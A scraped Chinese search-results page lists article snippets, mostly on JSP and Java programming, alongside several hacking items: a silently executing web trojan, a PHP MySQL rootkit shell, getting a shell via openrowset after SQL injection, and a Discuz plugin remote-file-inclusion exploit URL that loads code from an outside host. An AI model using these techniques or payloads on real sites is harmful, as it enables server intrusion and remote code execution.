搜索列表
-
网页木马代码例子(里面的文件是漏洞扫描器,呵呵)
【ASP编程】对于经常上网冲浪的朋友对于网页木马一定不会陌生,打开某个网站,莫名其妙的运行了某个木马,虽然在"Internet选项"里有"安全"设置,但是下面的代码就不会弹出任何信息就直接运行了程序,不信,follow me! (提示: 只是了解一下技术和方法,千万别搞破坏,yexj00.exe是一个windows2000 漏洞扫描器和查漏补...
网页木马代码例子(里面的文件是漏洞扫描器,呵呵) -
PHPSHELL又出新东东啦!
【安全相关】描述:一款类似于Sqlrootkit.asp的Mysqlrootkit.php,借助Mysql的root帐号进行一些操作.运行环境是php,但是一切操作都是在你连接的Mysql主机上,可以是本机也可以远程功能:1 读取服务器上的文件 2 移动服务器上的文件 3 上传文件到服务器上 4 有回显的执行命令,不用担心防火墙的限制而不能反弹shell啦! 5 支持Mysql 4.0与Mys...
PHPSHELL又出新东东啦! -
渗透中用openrowset搞shell的方法
【安全相关】渗透中用openrowset搞shell的方法 得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了. 联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事...
渗透中用openrowset搞shell的方法 -
PHPSHELL又出新东东啦!
【安全相关】描述:一款类似于Sqlrootkit.asp的Mysqlrootkit.php,借助Mysql的root帐号进行一些操作.运行环境是php,但是一切操作都是在你连接的Mysql主机上,可以是本机也可以远程功能:1 读取服务器上的文件 2 移动服务器上的文件 3 上传文件到服务器上 4 有回显的执行命令,不用担心防火墙的限制而不能反弹shell啦! 5 支持Mysql 4.0与Mys...
PHPSHELL又出新东东啦! -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
discuz许愿池插件远程包含漏洞
【安全相关】许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。 这里xxxx.txt用C...
discuz许愿池插件远程包含漏洞 -
一个简单的HTML病毒分析
【ASP编程】一直就想写这篇东西了,只是上班时说要上班,不写,回家后又忙着玩游戏,丢一边去了。现在只好不务正业的开写了,希望头儿不会知道我的blog。哈哈 在很久之前就对HTML的病毒很感兴趣了,很好奇怎么能远程向本地不经过允许就能下载可执行文件的,只是一直没机会搞得到ASP的原码,所以不才敢断章取义的去作什么分析。最...
|一个|个简|简单|单的|的H|HT|TM|ML|L病|病毒|毒分|分析|析| -
我认为JSP有问题(下)
【JSP编程】(作者:小龙亭主Blueski编译 2000年12月22日 14:22) (续上篇) 问题 #3: 简单工作仍然很累人 即使是很简单的工作,例如包含 header和 footer,在JSP中仍然很困难。假设有一个"header"和一个"footer"模板要包含到所有页面,而每一个模板要在content中包含当前的页标题。 在JSP中最佳办法是: ...
|我认|认为|为J|JS|SP|P有|有问|问题|题下|下| -
Java Servlet及Cookie的使用
【JSP编程】 本文介绍了Java Servlet编程所需的软件及环境配置。只要你有一台安装Windows 95/98了的PC机,便可以按照本文的步骤开发Servlet程序了。本文同时给出了通过Java Servlet向用户的硬盘写入和读取Cookie的方法及例程。通过它可以实现网上常见的个性化网页、网上购物篮、密码验证等。 J...
|Ja|av|va|aS|Se|er|rv|vl|le|et|t及|及C|Co|oo|ok|ki|ie|e的|的使|使用|用| -
困扰JSP的一些问题与解决方法
【JSP编程】 如今每一个使用servlets的开发者都知道JSP,一种由Sun公司发明并花费大量精力加以推行并建构在servlet技术之上的web技术。JSP将servlet中的html代码脱离了出来,从而可以加速web应用开发和页面维护。实际上,由Sun发布的官方"应用开发模型"文档上说得更远: "JSP技术应该被视为标准,而servlets在多数情况下可...
|困扰|扰J|JS|SP|P的|的一|一些|些问|问题|题与|与解|解决|决方|方法|法| -
Java学习的捷径
【JSP编程】1、jdk就是j2se,jdk1.1.8版本以后改成为j2se 下载地址:http://java.sun.com/j2se/downloads.html 2、jre是java运行时环境(jdk1.3版本以后都包含jre)不用单独下载 3、设置环境变量 安装了jdk以后,要配置环境变量 我的电脑->属性->高级->环境变量 添加以下环境变量(假定你的java安装在...
|Ja|av|va|a学|学习|习的|的捷|捷径|径| -
[JAVA]十四种Java开发工具点评
【JSP编程】 在计算机开发语言的历史中,从来没有哪种语言象Java那样受到如此众多厂商的支持,有如此多的开发工具,Java菜鸟们如初入大观园的刘姥姥,看花了眼,不知该何种选择。的确,这些工具各有所长,都没有绝对完美的,就算是老鸟也很难做出选择。在本文中我简要介绍了常见的十四种Java开发工具的特点,管中窥“器”,希...
|[J|JA|AV|VA|A]|]十|十四|四种|种J|Ja|av|va|a开|开发|发工|工具|具点|点评|评|
